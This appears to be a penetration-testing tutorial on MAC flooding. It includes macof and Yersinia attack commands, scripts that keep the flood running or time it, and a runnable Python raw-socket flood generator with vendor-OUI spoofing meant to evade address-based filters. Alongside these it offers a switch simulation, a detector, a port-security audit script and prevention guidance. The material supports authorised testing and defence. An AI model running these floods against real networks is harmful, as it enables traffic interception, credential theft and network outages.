MAC Flooding

Understanding MAC Flooding - Overwhelming Switch Memory

What is MAC Flooding?

Simple Definition: MAC flooding is a network attack that overwhelms a switch’s memory table with fake MAC addresses, forcing the switch to stop filtering traffic and broadcast all data to every connected device, effectively turning it into a hub.

Technical Definition: MAC flooding is a Layer 2 resource exhaustion attack that fills a switch's Content Addressable Memory (CAM) table with randomly generated source MAC addresses. Once the table is full the switch can no longer learn legitimate hosts, so frames addressed to them are treated as unknown unicast and flooded out every port in the VLAN (informally "fail-open" or "hub mode"), which lets an attacker sniff traffic on a switched network.

Why MAC Flooding Works

MAC flooding succeeds due to fundamental hardware and design limitations in network switches:

  • Finite CAM Table Size: Switches have limited memory for storing MAC address mappings (typically 8,000-32,000 entries)
  • Fail-Open Design: When CAM tables overflow, many switches default to broadcasting traffic to maintain connectivity
  • No Authentication: Switches accept any MAC address without verification
  • Learning Process: Switches automatically learn and store new MAC addresses from network traffic

Attack Process Breakdown

How Switches Normally Operate

  1. MAC Learning: Switch receives frame from device on port 1
  2. CAM Table Update: Stores source MAC address and associates it with port 1
  3. Intelligent Forwarding: Future frames to that MAC only go to port 1
  4. Network Isolation: Traffic between devices remains private

What Happens During MAC Flooding

  1. Flood Initiation: Attacker sends thousands of frames, each with a different random source MAC address
  2. CAM Table Filling: Switch learns each fake MAC as a new entry on the attacker's port
  3. Memory Exhaustion: CAM table reaches maximum capacity and stops learning
  4. Fail-Open Mode: Legitimate entries age out (or are evicted) and cannot be re-learned, so frames to those hosts become unknown unicast and are flooded out every port in the VLAN
  5. Hub Behavior: Every device in the VLAN, including the attacker, receives those frames
  6. Sniffing Opportunity: Attacker captures traffic the switch would normally have delivered only to its destination port

Real-World Impact

Network-Wide Eavesdropping: Once in fail-open mode, attackers can monitor all traffic on the network segment, not just their own

Credential Harvesting: Capture login credentials, session tokens, and sensitive data from all connected devices

Network Performance Degradation: Broadcasting all traffic causes significant bandwidth waste and network slowdown

WiFi Access Point Impact: A bridged access point puts its wireless clients' MAC addresses into the same CAM table as wired hosts; once the table is full, frames to those clients are flooded to every port as well, so the wired/wireless boundary offers no protection

Compliance Violations: Unintended data exposure may violate privacy regulations and security standards

Technical Concepts

CAM Table Fundamentals

Content Addressable Memory (CAM): High-speed memory that allows switches to perform rapid MAC address lookups for forwarding decisions. Unlike regular memory that’s accessed by address, CAM is searched by content (MAC address) and returns the associated port.

Table Structure:

  • MAC Address: 48-bit hardware address
  • Port Number: Physical interface identifier
  • VLAN ID: Virtual LAN assignment
  • Timestamp: Entry age for timeout
  • Type: Dynamic (learned) or Static (configured)

Switch Learning Process

Dynamic Learning: Switches automatically learn MAC addresses by examining source addresses of incoming frames

Aging Mechanism: Entries timeout after periods of inactivity (typically 5 minutes) to accommodate network changes

Table Management: Behaviour at capacity is vendor-specific. Most switches simply stop learning until entries age out; some evict older entries (FIFO or LRU). Either way, a legitimate host whose entry is gone cannot be re-learned while the flood keeps the table full, and that is what the attacker relies on

Fail-Open Mode Behavior

Unknown-Unicast Flooding: Frames for any MAC not in the table are forwarded out every port in the VLAN. At Layer 2 they remain unicast (tcpdump will not label them "Broadcast"), but the load on every link in the VLAN rises sharply

Security Implications: Network segmentation provided by switching is completely bypassed

Recovery: Once flooding stops and entries age out, normal switching behavior gradually resumes
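
The toy switch model below is an added example, not code from the original page: it implements the learning, aging and unknown-unicast flooding described above, runs the attack against two victim hosts, and then repeats it with a per-port MAC limit (the port-security control discussed later) to show the flood being stopped at the attacker's port. Port numbers, capacities and MAC addresses are constructed values; real switches differ in detail (per-VLAN tables, eviction policy), but the mechanism is the same.

```python
import random

BROADCAST = "ff:ff:ff:ff:ff:ff"


class Switch:
    """Toy switch with one shared CAM table (constructed model, not a real device)."""

    def __init__(self, ports, capacity, aging=300, max_macs_per_port=None):
        self.ports = list(range(1, ports + 1))
        self.capacity = capacity                    # CAM table size in entries
        self.aging = aging                          # idle seconds before an entry expires
        self.max_macs_per_port = max_macs_per_port  # port-security limit, None = off
        self.table = {}                             # mac -> (port, last_seen)
        self.shutdown = set()                       # ports disabled by a violation
        self.not_learned = 0                        # frames whose source could not be stored

    def _expire(self, now):
        for mac, (_, seen) in list(self.table.items()):
            if now - seen > self.aging:
                del self.table[mac]

    def _count_on_port(self, port):
        return sum(1 for p, _ in self.table.values() if p == port)

    def receive(self, port, src, dst, now):
        """Process one frame arriving on `port`; return the set of egress ports."""
        if port in self.shutdown:
            return set()
        self._expire(now)
        if src in self.table:                       # refresh an existing entry
            self.table[src] = (port, now)
        elif (self.max_macs_per_port is not None
              and self._count_on_port(port) >= self.max_macs_per_port):
            self.shutdown.add(port)                 # violation action: shutdown
            return set()
        elif len(self.table) < self.capacity:       # learn a new source
            self.table[src] = (port, now)
        else:                                       # table full: cannot learn
            self.not_learned += 1
        if dst != BROADCAST and dst in self.table:  # known unicast: one port only
            return {self.table[dst][0]}
        # unknown unicast or broadcast: flood to every other live port in the VLAN
        return {p for p in self.ports if p != port and p not in self.shutdown}


def random_mac(rng):
    return ":".join(f"{rng.randrange(256):02x}" for _ in range(6))


def flood_scenario(capacity=1000, port_limit=None, seed=1):
    """Hosts A (port 1) and B (port 2) talk while an attacker on port 3 floods.

    Returns (egress ports for A->B before the flood, egress ports for A->B
    after the flood, whether port 3 was shut down, final table size).
    """
    rng = random.Random(seed)
    sw = Switch(ports=4, capacity=capacity, max_macs_per_port=port_limit)
    a, b = "00:11:22:aa:aa:aa", "00:11:22:bb:bb:bb"
    sw.receive(1, a, b, now=0)                  # A learned on port 1
    sw.receive(2, b, a, now=0)                  # B learned on port 2
    before = sw.receive(1, a, b, now=1)         # normal: only port 2
    # Two bursts of `capacity` random sources; the second arrives after A and B
    # have been idle longer than the aging time, so their entries are gone
    for now in (2, 350):
        for _ in range(capacity):
            sw.receive(3, random_mac(rng), random_mac(rng), now)
    sw.receive(2, b, a, now=351)                # B talks but cannot be re-learned
    after = sw.receive(1, a, b, now=352)        # A->B is now flooded; port 3 sees it
    return sorted(before), sorted(after), 3 in sw.shutdown, len(sw.table)


if __name__ == "__main__":
    print("no port security:   ", flood_scenario())
    print("port-security max 2:", flood_scenario(port_limit=2))
```

Without a limit the A->B frame that used to leave only port 2 now leaves ports 2, 3 and 4 and the table holds nothing but attacker addresses; with a limit of two MACs per port the third fake address shuts port 3 down, A and B are re-learned normally, and the table ends with exactly two entries.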

Technical Implementation

Prerequisites

Network Requirements:

  • Wired access to the switched segment (a free port, or a compromised host already on it)
  • Network interface capable of generating high packet rates
  • Same broadcast domain as target systems

Essential Tools:

  • Macof: Specialized MAC flooding tool from dsniff suite
  • Yersinia: Layer 2 attack framework for control-plane protocols (STP, CDP, DTP, DHCP, HSRP, VTP, 802.1Q); it does not flood the CAM table itself, so it complements macof rather than replacing it
  • Tcpdump: Traffic monitoring to verify fail-open state
  • Wireshark: Detailed packet analysis

Essential Command Sequence

Step 1: Network Reconnaissance

# Identify connected network devices
nmap -sn 192.168.1.0/24
# -sn: Host discovery without port scanning
# Maps active hosts to establish baseline

# Check network interface statistics
ip -s link show eth0
# -s: Show statistics including current packet rates
# Baseline normal traffic levels before attack

# Monitor current network traffic patterns
tcpdump -i eth0 -c 100 -e
# -c 100: Capture 100 packets for baseline
# -e: Show Ethernet headers including MAC addresses
# Observe normal unicast traffic patterns

Purpose: Establish network baseline to recognize when switch enters fail-open mode. Understanding normal traffic patterns helps identify successful flooding.

Step 2: Switch Behavior Assessment

# Test current broadcast traffic levels
tcpdump -i eth0 -c 50 broadcast
# Captures broadcast frames only
# Low broadcast count indicates normal switch operation

# Verify you're on a switched network (not hub)
# Send ping to known host and monitor traffic
ping -c 3 192.168.1.100 &
tcpdump -i eth0 icmp
# Should only see your own ping, not others' traffic
# If seeing all traffic already, network uses hub or is compromised

Purpose: Confirm the network uses switches (not hubs) and establish baseline broadcast levels for comparison during attack.

Step 3: Execute MAC Flooding

Primary Tool: Macof

# Basic MAC flooding attack
macof -i eth0
# -i eth0: Interface to flood from
# Sends TCP SYN packets with random source and destination MAC and IP addresses as fast as the interface allows
# Default: Continues until stopped with Ctrl+C

# Controlled flooding with packet count
macof -i eth0 -n 50000
# -n 50000: Send 50,000 packets then stop
# Useful for testing switch CAM table size
# Typical small switch overflow: 10,000-30,000 MACs

# Flooding with fixed IP-layer parameters
macof -i eth0 -s 192.168.1.99 -n 10000
# -s: Source IP address (default: random); -d sets the destination IP
# Only the IP and TCP port fields are tunable; every frame still carries a
# fresh random source MAC, which is what fills the table

Alternative Tool: Yersinia

# Interactive ncurses interface (-G starts the GTK GUI instead)
yersinia -I
# Lists the supported protocols (STP, CDP, DTP, DHCP, HSRP, VTP, 802.1Q) and their attacks
# Yersinia has no CAM-table flooding attack; use macof for that

# Command-line STP denial of service
yersinia stp -attack 2 -i eth0
# Attack 2 is "sending conf BPDUs (DoS)": a flood of spoofed configuration BPDUs
# This targets Spanning Tree, not the CAM table, and can reconverge or partition
# the whole switched domain; run it only when STP testing is explicitly in scope

Step 4: Verify Fail-Open State

# Watch for unicast frames that are not addressed to you
MYMAC=$(cat /sys/class/net/eth0/address)
tcpdump -i eth0 -e -nn -c 50 "not ether broadcast and not ether multicast and not ether dst $MYMAC"
# Flooded frames are still unicast at Layer 2, so tcpdump does not label them
# "Broadcast" and counting broadcast lines misses them entirely
# Before the flood this capture stays almost silent (the switch delivers other
# hosts' unicast only to their own ports); during a successful flood it fills
# within seconds with frames exchanged between other hosts

# Capture interesting traffic during fail-open
tcpdump -i eth0 -w mac_flood_capture.pcap
# -w: Write to file for later analysis
# Captures all visible traffic while switch is overwhelmed
# Stop with Ctrl+C when sufficient data collected

Purpose: Confirm the switch has entered fail-open mode by observing broadcast behavior and visibility of other hosts’ traffic.

Step 5: Maintaining the Attack

# Continuous flooding to maintain fail-open state
while true; do
    macof -i eth0 -n 1000
    sleep 2  # Brief pause to avoid interface overload
done
# Sends bursts of 1000 packets every 2 seconds
# Maintains pressure on CAM table
# More stable than continuous full-rate flooding

# Monitor your interface for drops
watch -n 1 'ip -s link show eth0 | grep -A 1 "RX\|TX"'
# Updates every second
# Watch for dropped packets indicating overload
# Adjust flooding rate if drops occur

Purpose: Sustain fail-open mode while avoiding network interface overload that could disrupt the attack or cause detection.

Attack Variations

Targeted Source MAC Flooding

# macof offers no control over the source MAC: every frame carries a fully
# random 48-bit source address (and a random destination), so the only
# tunable parameters are the IP/port fields and the packet count
macof -i eth0 -s 192.168.1.50 -d 192.168.1.1 -n 10000
# -s / -d: source and destination IP addresses (default: random)
# Fully random sources are themselves a detection signature: unless the
# generator masks it, the I/G (multicast) bit is set in about half of them,
# and a real host never uses a multicast address as a source
# Making fake addresses look like a vendor's (e.g. a VMware OUI such as
# 00:50:56) requires a custom frame generator, not a macof option
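
The generator below is an added example, not code from the page or from the dsniff project: it builds macof-style Ethernet/IPv4/TCP SYN frames in pure Python and adds the one thing macof lacks, an optional fixed OUI prefix, while clearing the I/G bit so no source address is a multicast address. It serves both Step 3 above and this variation. Interface name, addresses and counts are placeholders; sending uses a Linux AF_PACKET socket and needs root, while building and checking frames runs anywhere.

```python
import random
import socket
import struct


def random_mac(rng, oui=None):
    """48-bit MAC as bytes. oui: optional 3-byte prefix such as b'\\x00\\x50\\x56'."""
    if oui is None:
        first = rng.randrange(256) & 0xFE            # clear I/G (multicast) bit
        return bytes([first]) + bytes(rng.randrange(256) for _ in range(5))
    return bytes(oui) + bytes(rng.randrange(256) for _ in range(3))


def checksum(data):
    """RFC 1071 ones-complement sum; returns 0 when run over data that already
    contains a correct checksum, which is how the test below verifies frames."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, seq):
    """Ethernet II / IPv4 / TCP SYN: the same shape of packet macof sends."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, 8192, 0, 0)
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, 6, len(tcp)))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return dst_mac + src_mac + b"\x08\x00" + ip + tcp


def flood_frames(count, seed=0, oui=None):
    """Yield `count` frames, each from a fresh random source MAC and IP."""
    rng = random.Random(seed)
    for _ in range(count):
        src_ip = ".".join(str(rng.randrange(1, 255)) for _ in range(4))
        dst_ip = ".".join(str(rng.randrange(1, 255)) for _ in range(4))
        yield build_frame(random_mac(rng, oui), random_mac(rng, oui), src_ip, dst_ip,
                          rng.randrange(1024, 65535), rng.randrange(1, 1024),
                          rng.getrandbits(32))


def send(iface, frames):
    """Linux only, needs CAP_NET_RAW. Returns the number of frames sent."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        return sum(1 for f in frames if s.send(f))


if __name__ == "__main__":
    import sys
    # usage: sudo python3 flood.py eth0   (placeholder interface; sends 50000 frames)
    print("sent", send(sys.argv[1], flood_frames(50000, oui=b"\x00\x50\x56")), "frames")
```

Because the OUI prefix is fixed, a rate-based detector still fires (tens of thousands of new addresses per second from one port is unmistakable); what the prefix defeats is only a filter that keys on unassigned or multicast source addresses.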

Distributed Flooding from Multiple Interfaces

# If system has multiple NICs, flood from all
macof -i eth0 -n 10000 &
macof -i eth1 -n 10000 &
wait
# Doubles the flooding rate only if both NICs sit on the same VLAN of the
# same switch; a second switch has its own CAM table
# Useful against switches with larger CAM tables

Timed Flooding Patterns

# Flood during specific time windows
for hour in 0 8 12 17; do
    echo "Waiting for ${hour}:00..."
    while [ $(date +%H) -ne $hour ]; do sleep 60; done
    macof -i eth0 -n 30000
    sleep 3600
done
# Fires one burst at each listed hour, then sleeps for an hour
# A single burst only holds the table until the entries age out (minutes),
# so this samples traffic at chosen times rather than sustaining fail-open state
# Each burst is still tens of thousands of new MACs from one port, which any
# learning-rate alert will catch; it only avoids the continuous load

WiFi Access Point Considerations

# Identify wireless access points on network
nmap -sn 192.168.1.0/24 | grep -B2 "Ubiquiti\|Cisco\|Aruba"
# Common enterprise AP manufacturers (vendor names come from MAC lookups,
# so this needs root and a directly attached segment)

# Watch for source MACs that were absent from the Step 1 baseline
tcpdump -i eth0 -e -nn 'not ether broadcast and not ether multicast'
# Clients of a bridged AP on the same VLAN appear with their own MACs once
# frames for them are flooded out the wired ports
# Exposes wireless traffic on the wired network

Impact on Wireless Networks: When switches connected to wireless access points enter fail-open mode, WiFi traffic becomes visible on the wired network, breaking wireless/wired segmentation.

Common Issues and Solutions

Problem: No effect on network traffic visibility

  • Solution: Increase packet count - modern switches have larger CAM tables (try 100,000+ packets). If nothing changes at any count, the port is probably limited by port security or a MAC learning limit; record that as a working control

Problem: Network becomes completely unusable

  • Solution: Reduce flooding rate, use bursts instead of continuous flooding

Problem: Attack detected and port disabled

  • Solution: That is port security doing its job (violation action shutdown). Record it as a finding in the client's favour; retrying on other ports, at lower rates, or with vendor-looking OUIs (which needs a custom frame generator, since macof has no such option) only tells you how consistently the control is applied

Problem: Switch recovers too quickly

  • Solution: Implement continuous low-rate flooding to maintain pressure on CAM table

Detection and Prevention

Detection Indicators

  • Sudden spike in never-seen source MAC addresses on a single port
  • Source addresses no real host would use: the I/G (multicast) bit set, or random OUIs that match no vendor on the network
  • Dramatic increase in broadcast traffic
  • Switch CPU utilization spike
  • Unusual number of MAC moves between ports
  • Network performance degradation
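
The detector below is an added example, not part of the page: it turns the first two indicators into code by reading lines in the format `tcpdump -e -nn -tt` prints on an Ethernet interface (a SPAN or mirror port is the realistic feed), counting never-seen source MACs per second and flagging any source with the I/G bit set. The capture it runs on is constructed inline, not a real trace; the threshold of 20 new MACs per second is an assumed starting point to tune against your own baseline.

```python
import re
from collections import defaultdict

# "1700000000.000000 00:1a:2b:00:00:01 > 00:1a:2b:00:00:02, ethertype IPv4 (0x0800), length 74: ..."
LINE = re.compile(r"^(?P<ts>\d+\.\d+) (?P<src>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) > "
                  r"(?P<dst>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}),")


def parse(lines):
    """Yield (timestamp, source MAC) for every line that matches tcpdump -e -nn -tt output."""
    for line in lines:
        m = LINE.match(line)
        if m:
            yield float(m.group("ts")), m.group("src")


def detect(lines, new_macs_per_sec=20):
    """Return (alerts, bad_sources).

    alerts: [(second, count)] for each second in which more than
            `new_macs_per_sec` never-seen source MACs appeared.
    bad_sources: source MACs with the I/G bit set; a multicast address is
            never a legitimate source, so even one is worth a look."""
    seen = set()
    new_per_sec = defaultdict(int)
    bad_sources = set()
    for ts, src in parse(lines):
        if int(src[:2], 16) & 1:
            bad_sources.add(src)
        if src not in seen:
            seen.add(src)
            new_per_sec[int(ts)] += 1
    alerts = [(sec, n) for sec, n in sorted(new_per_sec.items()) if n > new_macs_per_sec]
    return alerts, sorted(bad_sources)


def constructed_capture():
    """Ten seconds of three normal hosts, then one second of a flood (constructed data)."""
    fmt = ("{ts:.6f} {src} > {dst}, ethertype IPv4 (0x0800), length 74: "
           "10.0.0.1.40000 > 10.0.0.2.443: Flags [P.], seq 1:21, ack 1, win 501, length 20")
    hosts = ["00:1a:2b:00:00:01", "00:1a:2b:00:00:02", "00:1a:2b:00:00:03"]
    lines = []
    for i in range(30):                       # t = 1700000000 .. 1700000009
        lines.append(fmt.format(ts=1700000000 + i / 3, src=hosts[i % 3], dst=hosts[(i + 1) % 3]))
    for i in range(40):                       # 40 new sources inside second 1700000010
        src = "%02x:%02x:%02x:%02x:%02x:%02x" % (i % 7, 0x50, 0x56, i, 0xAA, 0xBB)
        lines.append(fmt.format(ts=1700000010 + i / 40, src=src, dst="ff:ff:ff:ff:ff:ff"))
    return lines


if __name__ == "__main__":
    alerts, bad = detect(constructed_capture())
    print("learning-rate alerts:", alerts)
    print("multicast-bit sources:", len(bad))
```

On a switch the same logic applies per port using the MAC address table or `mac-move` notifications; a host-side capture cannot tell which port a source arrived on, which is why the alert above is per second rather than per port.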

Prevention Measures

Port Security Configuration:

  • Limit maximum MAC addresses per port
  • Enable sticky MAC learning
  • Configure violation actions (shutdown/restrict)

Dynamic Port Security:

  • Automatic learning with limits
  • Age out unused entries
  • Alert on violations

CAM Table Monitoring:

  • Set thresholds for MAC learning rates
  • Alert on rapid CAM table growth
  • Monitor for suspicious MAC patterns

Network Design:

  • Implement VLANs to limit broadcast domains
  • Use private VLANs for host isolation
  • Deploy switches with larger CAM tables
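
The audit script below is an added example, not part of the page or of any vendor's tooling: it walks a Cisco IOS-style running-config and reports access ports on which MAC flooding would still work because port security is missing, the maximum is too generous, or the violation action and sticky learning are unset. The config text is constructed; the `switchport port-security` command syntax is standard IOS, but the interface names, VLANs and the policy limit of two MACs per port are assumptions.

```python
CONSTRUCTED_CONFIG = """\
!
interface GigabitEthernet1/0/1
 description user port, hardened
 switchport mode access
 switchport access vlan 10
 switchport port-security
 switchport port-security maximum 2
 switchport port-security violation shutdown
 switchport port-security mac-address sticky
 spanning-tree portfast
!
interface GigabitEthernet1/0/2
 description user port, weak: learns unlimited MACs
 switchport mode access
 switchport access vlan 10
!
interface GigabitEthernet1/0/3
 description port-security on, but default maximum and no explicit action
 switchport mode access
 switchport port-security
!
interface GigabitEthernet1/0/24
 description uplink, out of scope for the access-port check
 switchport mode trunk
!
"""


def interfaces(config):
    """Split running-config text into {interface name: [command lines]}."""
    result, current = {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            result[current] = []
        elif current is not None and line.startswith(" "):
            result[current].append(line.strip())
        else:
            current = None                      # "!" or a global command ends the block
    return result


def audit(config, max_allowed=2):
    """Return {access interface: [findings]} for ports that can still be flooded."""
    findings = {}
    for name, cmds in interfaces(config).items():
        if "switchport mode access" not in cmds:
            continue                            # trunks and routed ports are out of scope here
        issues = []
        if "switchport port-security" not in cmds:
            issues.append("port-security not enabled: unlimited dynamic MAC learning")
        else:
            for c in cmds:
                if c.startswith("switchport port-security maximum "):
                    n = int(c.rsplit(" ", 1)[1])
                    if n > max_allowed:
                        issues.append(f"maximum {n} exceeds policy limit of {max_allowed}")
            if not any(c.startswith("switchport port-security violation ") for c in cmds):
                issues.append("violation action not set explicitly (IOS default is shutdown)")
            if "switchport port-security mac-address sticky" not in cmds:
                issues.append("sticky learning not enabled")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for iface, issues in audit(CONSTRUCTED_CONFIG).items():
        print(iface)
        for issue in issues:
            print("  -", issue)
```

GigabitEthernet1/0/1 carries the configuration a hardened access port should have; the other two user ports come back with findings, and the trunk is skipped because a MAC limit on an uplink would break legitimate traffic.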

Professional Context

Legitimate Use Cases

  • Security Assessments: Testing switch security configurations and fail-open behavior
  • Network Testing: Validating switch CAM table sizes and overflow handling
  • Incident Response: Understanding attack impact during security incidents
  • Training: Demonstrating Layer 2 vulnerabilities in controlled environments

Legal and Ethical Requirements

Authorization: MAC flooding can cause severe network disruption - explicit written permission required

Scope: Define acceptable testing windows to minimize business impact

Recovery Plan: Ensure ability to restore normal network operation quickly

Documentation: Record all activities, findings, and network impact for assessment reports


MAC flooding remains an effective attack against improperly configured switches, demonstrating the importance of proper Layer 2 security controls and the risks of default switch configurations.